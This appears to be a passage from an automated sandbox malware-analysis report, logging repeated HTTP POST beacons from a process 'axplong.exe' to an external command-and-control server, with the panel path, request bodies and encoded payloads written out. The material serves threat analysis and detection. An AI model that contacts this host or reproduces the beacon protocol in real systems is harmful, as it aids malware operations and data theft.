                          7 | 192.168.2.4 | 55657 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:10.823120117 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:11.549422026 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:11.551275969 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:11.780131102 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.4 | 55658 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:11.905811071 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:12.620748997 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:12.623521090 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:12.857176065 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.4 | 55659 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:12.977821112 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:13.686417103 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:13.687414885 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:13.933962107 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.4 | 55660 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:14.055573940 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:14.782094002 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:14.784502029 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:15.020087957 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.4 | 55661 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:15.134735107 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:15.853360891 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:15.854372978 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:16.089590073 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.4 | 55662 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:16.211677074 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:16.939333916 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:16.940506935 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:17.173333883 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.4 | 55663 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:17.290596008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:18.010824919 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:18.011984110 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:18.243854046 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.4 | 55664 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:18.353413105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:19.070374012 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:19.071213007 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:19.303478956 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.4 | 55665 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:19.415422916 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:20.113703966 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:20.114624977 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:20.338655949 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.4 | 55666 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:20.454943895 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:21.163033962 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:21.168693066 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:21.562275887 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.4 | 55667 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:21.680618048 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:22.387645006 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:22.388715029 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:22.619709015 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.4 | 55668 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:22.727864981 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:23.436578989 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:23.438375950 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:23.667787075 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.4 | 55669 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:23.895128012 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:24.628212929 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:24.630661011 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:25.041414022 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.4 | 55670 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:25.149669886 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:25.849009991 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:25.849750996 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:26.077857018 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.4 | 55671 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:26.196990013 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:26.911773920 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:26.912630081 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:27.158252954 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.4 | 55672 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:27.275295019 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:28.001151085 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
